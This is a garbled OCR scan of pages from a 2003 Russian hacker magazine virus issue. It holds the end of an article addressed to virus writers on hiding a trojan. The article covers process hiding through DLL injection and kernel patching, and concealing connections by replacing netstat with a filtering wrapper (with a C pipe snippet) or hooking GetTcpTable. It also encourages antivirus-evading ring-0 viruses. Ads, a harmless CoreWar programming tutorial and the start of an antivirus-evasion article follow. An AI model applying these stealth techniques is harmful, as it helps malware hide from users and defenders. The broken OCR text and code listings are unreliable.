тище на С. Состоит он в том, чтобы 
воспользоваться библиотекой 
Detours от разработчиков Microsoft 
;). Она позволяет загрузить в чужой 
процесс свою DLL-6u6nvotTeky, а уж 
та может творить внутри все, что 
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ния для этого той же техники, что и в 
предыдущих двух способах. 

Но в идеале каждой пользовательс- 
кой программе нужно подсовывать 
"исправленные" версии таких срунк- 
ций. Как же это сделать? Делается это, 
как оказалось, несложно и достаточно 
лаконично. Дело в том, что их код хра- 
нится в одном месте физической памя- 
ти, ав каждый процесс лишь отобра- 
жается (спасибо дескрипторным табли- 
цам, о которых написано в статье про 
RingO), таким образом, остается лишь 
изменить эти функции в физической 
памяти, и счастье придет само собой! 
=) Но обычным способом это сделать 
невозможно, потому что эта область 
защищена от записи. Тупик? Нет! Ре- 
шение все-таки существует. 

Оно состоит в переходе на более глу- 
бокий уровень Windows, на уровень 
ядра или в так называемое нулевое 
кольцо защиты (RingO). Находясь 
именно в этом уровне, мы можем де- 
лать то, что обычным программкам 
Ha Visual Basic'e и не снилось, мы мо- 


А КОННЕКТ-ТО - BOT OH! 

м Итак, мы скрыли процесс, но это 
еще далеко не все. Как только твой пи- 
томец попытается подключиться к ка- 
кому-нибудь хосту в интернете, юзер, 
наученный статьей про защиту от за- 
разы ;-), воспользуется утилитой net- 
stat, увидит подозрительные коннекты 
со своего компа и тут же переставит 
Винду. Обидно, правда? Особенно, ес- 
ли ты пару недель парился и писал мо- 
дуль для ковыряния в кернеле. 
Хорошо, боремся с netstat'om: 

Ну, во-первых, можно "исправить баги" 
или попросту удалить сам netstat. Уда- 
лять - это совсем по-ламерски, поэтому 
будем отстреливать баги, а именно: 
нужно заставить netstat не говорить о 
тех коннектах, которые у нас есть. Сде- 
лать это можно, например, так: переи- 
меновываем Nnetstat.exe во что-нибудь 
еще, вместо него записываем свой би- 
нарник, который запускает оригиналь- 
ный netstat и фильтрует его вывод. 
Дешево и сердито. Это можно сделать, 
например, таким образом: 


hSaveStdout = GetStdHandle(STD_OUT- 
PUT_HANDLE); 
CreatePipe(&hChildStdoutRd, 
&hChildStdoutWr, &saAttr, 0); 
SetStdHandle(STD_OUTPUT_HANDLE, 
hChildStdoutWr); 
DuplicateHandle(GetCurrentProcess(), 
hChildStdoutRd, GetCurrentProcess(), 
&hChildStdoutRdDup , О, FALSE, DUPLI- 
CATE_SAME_ACCESS); 
CloseHandle(hChildStdoutRd); 


После этого создаем порожденный 
процесс (тот самый настоящий пе{- 
stat) и читаем то, что он нам выдает 
при помощи: 


ReadFile( hChildStdoutRdDup, 
chBuf, BUFSIZE, &dwRead, 
NULL); 


То, что получаем в буфере chBuf можем уже анализиро- 
вать на предмет наличия в нем того, что мы бы не хотели 
показывать :). Ну, с этой задачей, я думаю, ты и без меня 
разберешься. 

Вот что из этого получилось у меня (внимательно следи 

за портом 3707). Вывод оригинального netstat'a: 


"РИН Ю 
EKEEEREE EERO PRESS 
FRLERERREREREEES! 


SEEEERERETE 


ЕЕК 


ити 


LEDER D PRES RPOEDEE: 
ТЕЕЕЕ 


Правда, так лучше, если учесть, что троян висит именно 
на порту 3707? :) 

Как альтернативу этому способу можно предложить 
скрыть сетевые подключения при помощи замены ‹функ- 
ции в ядре (об этом я уже писал выше). А заменить нуж- 
но лишь одну функцию - GetTcpTable - именно она возв- 
ращает список ТСР-подключений. 


АЕСЛИ НЕ ОТ КОГО СКРЫВАТЬ?.. 

m Я неоднократно упоминал всякие ring 0, уровни ядра 
и прочую подобную ерунду. У тебя, наверное, возникла 
идея: а почему бы не сделать вирь, который бы просто 
находился в резидентном состоянии в ring 0, то есть C Te- 
ми же правами, что и ядро. Это практически идеально 
позволило бы защититься от большинства антивирусов. 
Должен тебя разочаровать, ты не первый, кто придумал 
нечто подобное. Такую идею, например, реализовывал 
Win.CIH (aka Чернобыль). Кстати, именно поэтому он об- 
ладал возможностью стирания BlOS'a. Правда, на момент 
написания его был известен способ перехода в Ring 0 
лишь в Win9x, сейчас дела обстоят хуже: этот режим стал 
доступен и в WinNT, так что жди нового, улучшенного 
WinNT.CIH!a... Представляю, как в твоем мозгу копошатся 
темные мысли о создании страшного недетектируемого 
ringO-Bupyca. Не обольщайся, многие современные анти- 
вирусы работают в том же кольце защиты, поэтому и там 
тебе придется укрываться от их зоркого взгляда :-(. 


БУДУЩЕЕ МАЛЕНЬКИХ СТЕЛСОВ 

и Что же ждет нас завтра? Я думаю, что следующим шагом 
в написании вирусов будет создание технологии, схожей с 
технологией эвристики в антивирусах. Представь себе вирус, 
который будет отлаживать все приложения в системе, ана- 
лизировать их код и прикидывать, антивирус ли это. И nog6- 
расывать антивирусам заведомо чистую информацию. По- 
моему, это было бы в высшей степени мощной системой. 
Стелсом нового поколения. Ну что, возьмемся за него? 
Кто знает, может быть, ты будешь автором такого BUPA? ;-) = 


ИГРЫ ПО КАТАЛОГАМ С ДОСТАВНОЙ НА ДОМ 


WWww.e-shop.ru 


www.gamepost.ru 
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Технические na раметры: 


Процессор: Intel Pentium-3 733 Mhz 
Графический процессор: 

nVidia XGPU 233 Mhz 

Производительность: 125 Млн пол./сек 
Память: 64 Mb 200 Mhz DDR 

Звук: nVidia MCPX 200 Mhz, 

256 каналов, Dolby Digital 5.1 

Прочее: 2-5x DVD-drive, жесткий диск 8 Gb, 
4xUSB-nopta, сетевая плата 100 MBps 
Воспроизведение О\/О-фильмов 
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Enter the Matrix 
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$83.99*/85.99 
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Pirates of the The Ultimate Halo 
Caribbean Companion 
DVD Set 


* — цена Ha американскую версию игры (NTSC) й 


Заказы по интернету — круглосуточно! | e 
Заказы по телефону можно сделать | 


СУПЕРПРЕДЛОЖЕНИЕ 
ДЛЯ ИНОГОРОДНИХ ПОКУПАТЕЛЕЙ 


Я ХОЧУ ПОЛУЧАТЬ БЕСПЛАТНЫЙ 
КАТАЛОГ X-BOX 


 <_—— х. ПООООИ 


ФИО 
ОТПРАВЬТЕ КУПОН ПО АДРЕСУ: 101000, МОСКВА, ГЛАВПОЧТАМТ, А/Я 652, E-SHOP 
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ИГРЫ НАСТОЯЩИХ 
КОДЕРОВ 


COREWAR АКА БОЙ В ПАМЯТИ 


ерез год игре CoreWar исполнится двадцать лет. Тем не менее, мало кто знает о ней, даже в программерской среде. 
Причем здесь программеры? А при том, что CoreWar можно назвать игрой весьма условно. Я надеюсь, прочитав 
эту статью, ты поймешь, почему она напечатана в номере, посвященном вирусам. 


= 1984 rogy, B KypHane 


"Наука Америки", npo- 


рессор A.K.Dewdney 
(go сих пор не знаю, 

| как произносится его 
фамилия :)) опубликовал статью о 
придуманной им игре, которую он 
назвал CoreWar. Смысл заключался 
в следующем: участники писали 
программы на языке, похожем на ас- 
семблер, и этим программам Npegc- 
тояло сражаться за свободное мес- 
то в выделенном куске памяти. В 
статье Dewdney составил четкие 
правила, по которым программа 
признавалась побежденной, предус- 
мотрел возможность ничьей, предс- 
тавил публике несколько различ- 
ных программ-бойцов. Игра приш- 
лась по вкусу и за короткое время 
нашла столько поклонников, что 
вскоре ими было создано Междуна- 
родное Общество Любителей 
CoreWar (ICWS - 
InternationalCoreWarSociety). Обще- 
ство занималось распространением 
игры, проведением чемпионатов и, 
конечно, разработкой стандартов. 
Было предпринято много попыток 
улучшить и дополнить язык 
Redcode, предложенный Dewdney 
для CoreWar, и в результате, на се- 
годняшний день существуют три ос- 
новных стандарта: ICWS'86, ICWS'88 
и ICWS'94, Первый из них, OT 1986 
года, давно устарел и не использу- 
ется. Де-факто на сегодня - версия 
ICWS'94, в которой язык Redcode 
был дополнен некоторыми принци- 
пиально новыми возможностями 
(например, была введена поддержка 
многозадачности). Однако по 
ICWS'88 все еще проводятся бои, 
поэтому в комментариях к програм- 
ме-бойцу необходимо указывать, 
для какого стандарта предназначен 
BOUH. 


Для того чтобы войти в мир CoreWar, 
надо совсем немного: программа-си- 
мулятор и эта статья. Самый распрост- 
раненный симулятор CoreWar называ- 
ется pMARS (portable Memory Array 
Redcode Simulator). Взять его, вместе 
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с кучей другой информации по 
CoreWar, можно на www.koth.org. В 
этой статье я буду ориентироваться 
на pMARS 0.8.0, и первое, что нам 
предстоит сделать - разобраться, как 
работать с этим симулятором. 


PMARS 0.8.0 
и У меня были проблемы с запуском 
pMARS nog ХР, поэтому, если у тебя 


NT-based Виндовс, можешь использо- 
вать альтернативный пакет: ftp.uni- 
yar.ac.ru/home/libra/core_war.zip. 
Итак, с koth.org ты должен взять сам 
симулятор (ртаг$08.71р) и пакет 
инструментов к нему (ptoolstl.zip). Оба 
архива нужно распаковать в одну 
папку. Создаешь в этом же каталоге 
файл imp.red, и пишешь в нем следу- 
ющее: 


MOV О, 1 


Ты только что создал собственного 
CoreWar-6onua! Как это работает, я 
объясню чуть позже, а сейчас запус- 
Kai pshell.exe - оболочку для pMARS. 
Во-первых, установи опцию Options- 
>Coreviewer в значение text. Теперь 
бой программ будет изображаться 
АЗС!-символами, а не грасфикой. По- 
чему? Так проще разбираться на пер- 
вых порах, когда не понимаешь зна- 
чения различных изображений. Во- 
вторых, иди в Options->Values и ставь 
цифру 7 в окошке Display Speed. Так 
ты сможешь наблюдать за ходом бит- 
вы в неспешном темпе. Теперь мы го- 
товы к первой битве! File->Load, выби- 
раешь два раза один и тот же дайл - 
imp.red, и жмешь на Run. Тебе, навер- 
ное, еще многое непонятно, но поль- 


зоваться PMARS'OM ты уже умеешь. 
Переходим к тому, из-за чего все и за- 
тевалось - учимся программить на 
Redcode! 


ПРАВИЛА 

mg Итак, язык, на котором пишутся 
программы-бойцы, называется 
Redcode. Рассказать в небольшой 
статье обо всех возможностях 


Redcode нереально, поэтому мы огра- 
ничимся основами, "каркасом" языка. 
Но прежде чем приступать Henocpeg- 
ственно к коду, разберемся, как про- 
текает бой в памяти. 


Единица измерения памяти в 
CoreWar - команда, она же инструк- 
ция. В отличие от ассемблера настоя- 
щего, в Redcode все инструкции "ве- 
сят" одинаково: любая строка на 
Redcode занимает ровно одну "ко- 
MaHgy". Поле боя обычно имеет раз- 
мер 8000. Т.е. программа, состоящая 
из восьми тысяч команд, займет со- 
бой все поле. 


Сначала pMARS загружает противни- 
ков в память, размещая их на поле 
боя случайным образом (можно ука- 
зать расположение и вручную, но по 
правилам турниров - random). Потом 
симулятор выполняет первую коман- 
ду одного из бойцов (неважно како- 
го), затем первую команду второго, 
вторую команду первого, вторую ко- 
MaHgy второго ит.д. Так повторяется 
go тех пор, пока одна из программ не 
будет признана проигравшей или си- 
мулятор не объявит ничью. Правила, 
вкратце, таковы: 

1. Процесс, попытавшийся выполнить 
данные, а не код, погибает. 


2. Программа, все процессы которой 
мертвы, проигрывает. 

Простая программа имеет всего один 
процесс, процессы же сложных прог- 
рамм могут исчисляться десятками. 
Ты, наверное, не совсем понял, что 
значит "выполнить данные, а не код" 
ит.9., но после прочтения следующе- 
го раздела все должно стать крис- 
тально ясно :). 


— ee 


| Навороченный эмулятор, в котором я 
так и не разобрался 

REDCODE 

Redcode использует ассемблер- 
ные команды, но не в привычном сти- 
ne Intel, а в синтаксисе AT&T: 
«инструкция» ‹источник> ‹приемник» 
А не наоборот, как привыкли любите- 
ли tasm'a, masm'a и прочих ассембле- 
ров с синтаксисом Intel'a. Первая ко- 
манда, с которой мы познакомимся - 
MOV, так как с ее помощью уже мож- 
но написать простейшего бойца. 


"MOV А, В" скопирует одну команду 
по адресу А, в место с адресом В. Отс- 
чет ведется от текущей инструкции, 
т.е. "MOV -1, 1" скопирует команду, 
предшествующую MOV, на место ко- 
манды, следующей после MOV. Если 
программа выглядит так: 


то после выполнения команды "MOV - 
1, 1", она примет вид: 


Просто, не так ли? Теперь мы может 
написать нашего первого воина. Его 
код состоит всего из одной строчки: 


Эта единственная команда копирует 
саму себя на место следующей ко- 
манды: 


В дальнейшем слова "сейчас PMARS 
выполнит эту команду" мы будем за- 
менять стрелкой "<---". Края поля боя 
замкнуты, т.е. после адреса 7999 сно- 
ва идет 0, поэтому, приведенная вы- 
ше программа, заполнив поле цели- 
ком, начнет следующий круг, и будет 
заполнять поле инструкциями "MOV 
O, 1" до бесконечности. Это один из 
классических бойцов, и имя ему - тр. 
Если принцип его работы на словах 
звучит не очень понятно, проведя в 
рМАЮ5$'е несколько схваток, ты точно 
во всем разберешься. Если сейчас 
мы стравим на поле боя двух Импов, 
симулятор провозгласит ничью: так 
как оба Импа имеют одинаковую ско- 
рость, они просто будут бесконечно 
"гоняться" друг за другом. Поэтому 
для испытаний нам потребуется gpy- 
гой боец. 


| Два Импа гоняют друг друга по полю :)_ 


Итак, следующая команда Redcode. 
"МР А" передает управление на ко- 
MaHgy с адресом А (как ты помнишь, 
адресация идет относительно теку- 
щей команды). Так что затруднений с 
другим классическим воином - Wait, у 
тебя возникнуть не должно. Сохрани 
следующую строчку в файле 
wait.red: 


Да! OH ничего не делает, a просто 
каждый цикл передает управление на 
себя же, т.е. находится в бесконечном 
цикле. Вот с этим-то "воином" мы и 
стравим нашего Импа. File->Load, вы- 
бирай Импа и Вэйта, жми Run. Вопрос 
на засыпку: кто победит? А вот и не"! 
Не победит никто - PMARS объявит 
ничью! Почему? Помнишь, я давал 
два основных правила CoreWar? Я 
говорил, что программа проигрывает, 
только если попытается выполнить 
данные, а не код? То-то же. Имп, gon- 
дя gO того места, где стоит зациклен- 
ный Bait, перепишет его "JMP 0" 
своим "MOV 0, 1", и Вэйт сам превра- 
тится в Импа! То есть на поле боя бу- 
дет два Импа, что, как мы уже говори- 
ли, приведет к ничьей! Получается, 
Имп вообще не способен победить 
кого-либо? В принципе, да - Имп мо- 
жет выиграть только в том случае, 
если вражеская программа самоунич- 


тожится. Впрочем, как и Вэйт. Темне у 


В ПРОДАЖЕ С 9 ОКТЯБРЯ 


World of Warcraft 


Сможет nu World of Warcraft 
совершить долгожданный прорыв 
в жанре онлайновых КРС? 


МЫСЛИ ВСЛУХ 


Кто одержит победу в битве шутеров, 
посвященных Второй мировой войне? 
Читайте наш специальный репортаж 
про двух главных соперников: Са! of 
Duty и Medal of Honor: Pacific Assault. 


ДЕМИУРГИ Il 


Эту игру мы ждали с нетерпением со 
дня первого анонса и вплоть до 
выхода. И вот она на нашем разде- 
лочном столе: красивая и свежая! 
Читайте эксклюзивный обзор! 


ТЕСН 


Тест: семь мониторов для игроманов. 
Сделай сам: собираем домашний 
кинотеатр. Первый взгляд: системная 
плата Gigabyte GA-7VT600 1394. 
Джойстик Saitek Cyborg Evo. 3D- 
акселератор ASUS V9950 Ultra. 
«Крякнутый Кейс». Новости. 


А также: новости, preview, review, 
loading, советы по прохождению игр, 
как это делается..., игровая альтер- 
натива, двадцатка лучших игр, гра- 
фик выхода игр и многое другое 
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менее, идея, положенная в основу 
Импа, используется во многих 3qp- 
фективных программах-бойцах. 


Тебе, наверное, уже не терпится пос- 
мотреть на полноценную программу, 
которая сможет победить хотя бы 
Вэйта? Мы напишем такую программу, 
но для этого нам нужно узнать еще 
две команды и познакомиться с дру- 
гими способами адресации. 


ADD, DAT, @ u # 


"ADD A, В" прибавит команду с agpe- 
сом А к команде с адресом В и запи- 
шет результат по адресу В. Такая 
cpopma ADD нас не устраивает, поэто- 
му перепишем ее так: "ADD А, В". Te- 
перь это означает: прибавить число А 
ко второму операнду команды с agpe- 
сом В (чаще говорят "к В-полю коман- 
ды садресом В"). Слишком запутан- 
но? Смотри: 


ADD #1, 1 ; <--- 
MOV 0, 9 


Команда ADD в данном примере при- 
бавит число один к В-полю инструк- 
ции MOV, превратив эту команду в 
Импа: "MOV О, 1". Т.е. знак # означает, 
что имеется в виду не адрес, а конк- 
ретное число. 


Что делает команда MOV в следую- 
щей программе? 


JMP 1 ;<— 


Что происходит? JMP передает уп- 
равление на следующую команду, а 
следующей команды нет! Изначаль- 
но, gO того, как выпустить бойцов на 
поле, рМАК$ заполняет поле нулями, 
т.е. данными. И наша программа, пы- 
таясь выполнить данные, а не код, 
погибает! Теперь-то ты точно пони- 
маешь, как работает Имп: он мостит 
перед собой дорогу инструкциями 
"MOV О, 1" и поэтому никогда не вы- 
полнит данные вместо кода! У тебя 
не возникает никаких идей? А нель- 
зя ли насильно заставить вражес- 
кую программу выполнить данные? 
Например, подбросить на пути Импа 
пару ноликов? Можно! 


Команда DAT определяет данные. 
Первое поле команды ни на что не 
влияет, но может использоваться для 
адресации, второе же задает то чис- 
ло, которое будет расположено на 
этом месте. В самом начале поле боя 
заполнено командами "БАТ #0, #0", 
т.е. нулями. Вот боец-самоубийца: 


УМР1 = 
DAT #0, #0 


Он полностью идентичен предыдуще- 
му (JMP 1), но так нагляднее. Теперь, 
овладев основами Redcode, мы может 
создать первого настоящего бойца! 


А нельзя ли насильно заставить 
вражескую программу выполнить данные? 
Например, подбросить на пути Импа 
пару ноликов? 


MOV О, @1 “ae 
ADD #1, 1 


Она копирует саму себя по адресу, на 
который указывает второй операнд 
команды по адресу 1. Ты помнишь, что 
все адреса рассчитываются относи- 
тельно текущей инструкции? По адре- 
cy Тнаходится команда ADD, второй 
операнд которой равен 1. Следова- 
тельно, MOV копирует саму себя по 
адресу, равному единице относитель- 
но ADD. Таким образом, после выпол- 
нения первой инструкции, поле будет 
выглядеть так: 


MOV О, @1 
ADD #1, 1 ; <--- 
MOV 0, @1 


Понятно? Теперь разберемся по- 
подробнее, как погибает процесс. 
Хочешь посмотреть на программу, 
которая проигрывает бой с Вэйтом? 
Смотри: 


ХАКЕРСПЕЦ | 10(35) [2003 


DWARF 
и Сразу же даю листинг, a разби- 
раться будем потом: 


ADD #4, 3 i a 
MOV 2, @2 

УМР -2 

DAT #0, #0 


Команда ADD прибавит число 4 к B- 
полю инструкции "БАТ #0, #0", прев- 
ратив ее в "DAT #0, #4": 


ADD #4, 3 

MOV 2, @2 no 
УМР -2 

DAT #0, #4 


Команда MOV скопирует команду 
"DAT #0, #4" по адресу, содержаще- 
муся в В-поле инструкции "DAT #0, 
#4", т.е. по адресу 4, относительно ко- 
манды DAT: 


ADD #4, 3 
MOV 2, @2 
МР -2 sen 


DAT #0, #4 


DAT #0, #4 


Теперь JMP переведет управление Ha 
две команды назад: 


ADD #4, 3 oes 
MOV 2, @2 

JMP -2 

DAT #0, #4 


DAT #0, #4 


ADD прибавит 4 к В-полю команды 
"DAT #0, #4", превратив ее в "DAT 
0, #8": 


ADD #4, 3 

MOV 2, @2 а 
УМР -2 

DAT #0, #8 


DAT #0, #4 


MOV скопирует инструкцию DAT #0, 
#8 по адресу 8, относительно 
инструкции "DAT 30, #8": 


"DAT #0, #8": 

ADD #4, 3 

MOV 2, @2 

MP -2 eee 
DAT #0, #8 


DAT #0, #4 


DAT #0, #8 


Теперь JMP снова передаст управ- 
ление на ADD, и все повторится: еще 
через четыре инструкции программа 
бросит команду "DAT #0, #12". 
Дварф (так называется этот боец) 
бомбит поле боя данными, с проме- 
жутком в три инструкции. Враг, нас- 
тупивший на бомбу, т.е. пытающийся 
выполнить команду DAT, погибает. 
Но ты ведь помнишь, что поле боя 
замкнуто, и, добомбив его до конца, 
Дварф начнет закидывать DAT'bI, 
начиная с адреса 0, и вскоре сам по- 
падет под собственные бомбы! Нет, 
не попадет. Не зря же промежуток 
между минами составляет ровно три 
инструкции - этого как раз хватает, 
чтобы сама программа смогла помес- 
титься между бомбами. Т.к. команда 
ADD каждый раз прибавляет к DAT'y 
число четыре, то Дварф защищен 
от собственных мин на любом поле, 
размер которого кратен четырем. 
Минутку, ведь враг тоже может 
проскочить между снарядами? Да, 


может. Ho чего ты хотел от бойца в 
четыре строчки? :) 


ИМПОЛОВКА 

и Сейчас я расскажу тебе о приеме, 
называемом ImpGate, и курс "Основы 
Redcode" можно считать оконченным. 
Многие серьезные CoreWar-nporpam- 
мы тем или иным способом использу- 
ют принцип саморазмножающихся 
Импов: кто-то делает ставку на "Коль- 
uo", когда в атаку одновременно идут 
несколько Импов, кто-то использует 
их как прикрытие, но факт остается 
срактом - Импы живы! А значит, надо 
уметь противостоять им. Итак, импо- 
ловка, по научному ImpGate: 


УМР 0, <-10 


Да, такая маленькая, но крайне эф- 
фективная против Импов. Как же это 
работает? Ты, наверное, удивлен, по- 
чему у команды JMP Bgpyr появи- 
лось В-поле. Помнишь ситуацию с 
DAT, когда второй операнд задавал 
данные, а А-поле ничего не делало? 
Тут похожая ситуация, но сначала о 
знаке "<". Инструкция "<-10" умень- 
шает на единицу В-поле команды, на- 
ходящейся Ha 10 инструкций раньше 
текущей. Таким образом, команда 
"JMP О, <-10" каждый цикл выполня- 
ет сразу два действия: продолжает 
выполнять бесконечный цикл и 
уменьшает второй операнд некой 
инструкции, находящейся на 10 пози- 
ций раньше МР. А какая инструкция 
находится там в случае чистого по- 
ля? Правильно, "DAT #0, #0". Зна- 
чит, после первого цикла там будет 
уже "DAT #0, #-1", после второго - 
"DAT #0, #-2" и т.д. Вот это место и 
называется Gate (или ловушка). Все 
это очень интересно, но причем 
здесь Импы? Чтобы понять это, рас- 
смотрим бой между Импом и Импо- 
ловкой (для краткости листингов 
предположим, что Имп и Имполовка 
расположены недалеко друг от друга 
- сути дела это не меняет): 


Первый цикл (стрелкой обозначена 
инструкция, которую Имп будет вы- 
полнять следующей): 

MOV 0,1 ; <--- 


DAT #0, #0 ; здесь намечается 
создать ловушку 

Второй цикл: 

MOV 0,1 

MOV 0,1 ; <--- 

DAT #0, #-1 ; здесь уже созда- 
на ловушка 


Третий цикл (после хода Импа): 
MOV 0,1 ; здесь высадился Имп 
MOV 0, 1 

MOV 0,1 ;<--- здесь была ловушка 


На третьем цикле Имп переписывает 
собой ловушку. В свой черед JMP 
уменьшает В-поле ловушки на едини- 


цу. Но там же уже не ловушка, а Имп! 
А какая разница? 


Третий цикл (после хода Имполовки): 
MOV 0,1 ; здесь высадился Имп 
MOV О, 1 
MOV О, О ; <--- JMP уменьшил В-поле 
MOV'a на единицу 
Четвертый цикл (после хода Импа): 
MOV 0,1 ; здесь высадился Имп 
MOV О, 1 
MOV 0, О ; здесь была ловушка 

— 


Имп выполняет команду "MOV 0, 0": 
копирует эту команду на ее же место, 
т.е. вообще ничего не делает, но счет- 
чик команд работает и следующая 
инструкция, которую выполнит Имп - 
данные, а не код - "БАТ #0, #0"! 


Четвертый цикл (после хода Имполов- 
ки): 
MOV 0,1 ; здесь высадился Имп 
MOV О, 1 
MOV О, -1 ; здесь была ловушка 
о 


На пятый цикл Имп пытается выпол- 
нить данные и погибает. Победа! 


АДВАНСЕД 

m Как я уже говорил, изучив техни- 
ки Imp, Dwarf и ImpGate, можно счи- 
тать, что базовый курс Redcode и 
CoreWar пройден. Но помнишь, я го- 
ворил, что многие программы так или 
иначе используют принципы работы 
Импа, и даже называл одну из таких 
тактик - "Кольцо"? Тем, кто дочитал 
go этого места, я расскажу об этом 
самом "Кольце". И если Имп, Дварф 
и Имполовка были просто обучаю- 
щими программами, то ImpRing - нас- 
тоящий боевой модуль. 


Новая команда - SPL. "SPL А" nepega- 
ет управление на адрес А (в точности 
как JMP А), но при этом продолжает 
выполнение следующей инструкции. 
Таким образом команда SPL (сокра- 
щение от Split - расщепить, разде- 
лить) создает новый процесс. Вот мы 
и добрались до программ со многими 
процессами! Классический пример, на 
котором обычно объясняют принцип 
работы SPL, выглядит так: 


SPL O Fe 
MOV 0, 1 


Команда SPL передает управление 
на себя, но одновременно создает 
второй процесс на команде MOV. 
Здесь у тебя может возникнуть воп- 
рос: как PMARS проводит бой, если 
одна программа имеет два процесса, 
а другая - один? В таком случае хо- 
ды будут чередоваться следующим 
образом: 


- программа 1, процесс 1 
- программа 2, процесс 1 
- программа 1, процесс 2 


В сентябрьском номере 
"MC" поместились тесты 
20 устройств, 
расширенный каталог 
PDA, ноутбуков и 
сотовых телефонов, 
статьи об особенностях 
применения мобильных 
устройств - как можно 
развлекаться при 
помощи КПК, уменьшить 
шум от ноутбука и 
использовать ММ$ - а 
также новости, обзоры, 
интервью и другие 
материалы. 


Обратите внимание на 
СО, который 
прилагается к каждому 
поступающему в 
продажу журналу: на 
нем разместилось 

248 программ! 


(@ame)!and 


ИГРЫ НАСТОЯЩИХ КОДЕРСВ \ 


- программа 2, процесс 1 
- программа 1, процесс 1 
- программа 2, процесс 1 
- программа 1, процесс 2 


Т.е. больше в данном случае не зна- 
чит лучше. Возвращаемся к нашему 
примеру. Теперь нам понадобятся две 
стрелки :). 


SPL O ; <-- 2-ой процесс 
MOV 0,1 ; <--- Тый процесс 


Заметь, что процесс, созданный SPL, 
становится вторым процессом, а не 
первым. 


SPL О ; 3-ий процесс 
MOV 0,1 ; 2-ой процесс 
MOV 0,1 + Тый процесс 


Опять же, обрати внимание, что про- 
цессы, создаваемые SPL, помещают- 
ся в конец так называемой "очереди 
процессов". Приведенная программа 
будет создавать новый процесс с Им- 
пом каждый раз, когда очередь дой- 
дет до процесса, в котором выполня- 
ется команда "SPL О". Теперь, разоб- 
равшись с процессами, можно прис- 
тупать к рассмотрению техники 
ImpRing. Существует несколько раз- 
личных вариантов этого метода, но 
мы рассмотрим один из самых прос- 
тых, который использовал А.Ивнер в 
своем "Трезубце": 


JMP imp-2666 
start SPL -1 
; <-- Тый процесс 
SPL imp+2667 
imp MOV 0, 2667 


В этом примере первый раз за всю 
статью используются метки - здесь 
без них не обойтись. Метка imp введе- 
на исключительно оля удобства объ- 
яснения, а вот обозначение start не- 
обходимо, чтобы указать точку входа 
в программу. Будет немного запутан- 
но, но что поделаешь? 


Команда SPL разбивает первый про- 
цесс на два: вторым становится 
инструкция, следующая 3a SPL, а 
третьим - инструкция, на которую ука- 
зывает операна SPL: 


JMP imp-2666 :<—3 
start SPL -1 
SPL imp+2667 <2 


imp MOV 0, 2667 


Выполняется еще одна команда SPL: 
второй процесс разбивается на чет- 
вертый и пятый, причем пятый нахо- 
дится аж через 2667 инструкций 
после метки imp. Заметь также, что 
пятый процесс сейчас находится в 
чистом поле. Если мы не успеем пос- 
тавить на его пути команду, он по- 
гибнет! 


ХАКЕРСПЕЦ | 10(35) 2003 


JMP imp-2666 


SPL] 
SPL imp+2667 
imp MOV 0, 2667 


oo 4 
imp+2667: 

DAT #0, #0 
(c= 5 


Выполняется команда JMP, создавая 
процесс №6: 


imp-2666: 
DAT #0, #0 
PG 


JMP imp-2666 
start SPL-1 
SPL imp+2667 
imp MOV 0, 2667 


oo 4 
imp+2667: 

DAT #0, #0 
5 


Выполняется четвертый процесс - 
MOV копирует себя по адресу 
imp+2667. Если бы мы этого не сдела- 
ли, следующим ходом процесс №5 вы- 
полнил бы DAT #0, #0 и погиб! 


imp-2666: 
DAT #0, #0 
7-6 


JMP imp-2666 
start SPL.-1 
SPL imp+2667 
imp MOV О, 2667 


рат 
imp+2667: 

MOV O, 2667 
725 


Ты помнишь, что концы поля боя 
замкнуты? Процесс №5 копирует ко- 
MaHgy MOV на 2667 инструкций даль- 
ше себя, а фактически, по адресу imp- 
2666, т.е. как раз по адресу процесса 
6, который должен выполняться сле- 
дующим! Теперь понятно, почему 
выбраны именно такие цифры 
(2666+2777+2777=8000)? 


imp-2666: 
MOV 0, 2667 
EG 


JMP imp-2666 
start SPL-1 
SPL imp+2667 
imp MOV 0, 2667 


7 


imp+2667: 
MOV 0, 2667 


es 


Процесс №6 копирует MOV no agpe- 
cy процесса №7, TOT, в свою оче- 
редь, копирует MOV по адресу про- 
цесса №8 и т.д. Все, кольцо запуще- 
но! Теперь по полю боя медленно, 
но неумолимо движутся три Импа! К 
тому же, "Кольцо" лишено главного 
недостатка обычного Импа - неспо- 
собности убить врага! Почему? Пом- 
нишь, я говорил об "очереди про- 
цессов"? Если враг имеет один про- 
цесс против наших трех, происходит 
следующее: ImpRing переписывает 
врага инструкцией MOV, враг своим 
ходом выполняет ее и попадает на 
DAT #0, #0, "Кольцо" выполняет 
MOV - следующим ходом оно запи- 
шет на место DAT #0, #0 команду 
"MOV О, 2667", ходит враг и выпол- 
няет инструкцию DAT. Т.е. медлен- 
ное "Кольцо" просто не успевает 
подставить однопроцессному про- 
тивнику команду! Если это плохо 
воспринимается на словах, возьми 
карандаш и бумажку и разыграй 
бой ImpRing'a и Wait'a - все сразу 
становится на свои места. 


Вот оно - Кольцо Импов! 


ЧТО ДАЛЬШЕ? 

ш Ты познакомился с несколькими 
распространенными техниками и ос- 
воил начала Redcode. С этими знани- 
ями уже можно пытаться писать 
собственных бойцов, либо придумы- 
вая совершенно новые стратегии, 
либо комбинируя старые приемы. Ты 
видел, каких длинных объяснений 
потребовала программа из четырех 
строк (ImpRing), а представь, что 
есть бойцы, глядя на код которых, 
теряются даже бывалые ассемблер- 
щики. А какие красивые и изощрен- 
ные приемы были изобретены за 
двадцать лет! Чего только стоят Вам- 
пиры, которые раскидывают на поле 
боя ловушки-/МР'ы, приводящие 
своих жертв прямо в руки губителя! 
Так что разбирайся в премудростях 
Redcode - как знать, может, еще дож- 
демся ICWS'2004 и сойдемся в бою 
на куске памяти величиной восемь 
тысяч инструкций. 


P.S. Я даю всего одну ссылку, но там 
ты найдешь все, что тебе нужно: 
http://directory.google.com/Top/Game 
s/Video_Games/Simulation/Programmi 
ng_Games/Core_War/ at 


` 
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Фуйкция MagicBright - 
} одно прикосновение 


alley 


MagicBright | 


Нажатием одной кнопки MagicBnight 
устанавливается оптимальное значение яркости 
150 кд/м? - тежст * 200 кд/м? - интернет * 330 кд/м? - игры, фото, OVO 


накодится на сайте WW затпеыио. гы в разделе "Гав Купить 


БОРЬБА ЗА ВЫЖИВАНИЕ | 


Эдайн Гхэллах 


БОРЬБА 
ЗА ВЫЖИВАНИЕ 


СПОСОБЫ ЗАЩИТЫ ОТ АНТИВИРУСОВ 


А - враг каждого вирусописателя, по определению. Мы создаем вирусы, они находят и убивают их. Вирусописа- 
тели создают все более и более сложные вирусы, а антивирусники - все более и более совершенствуют свои продукты. 
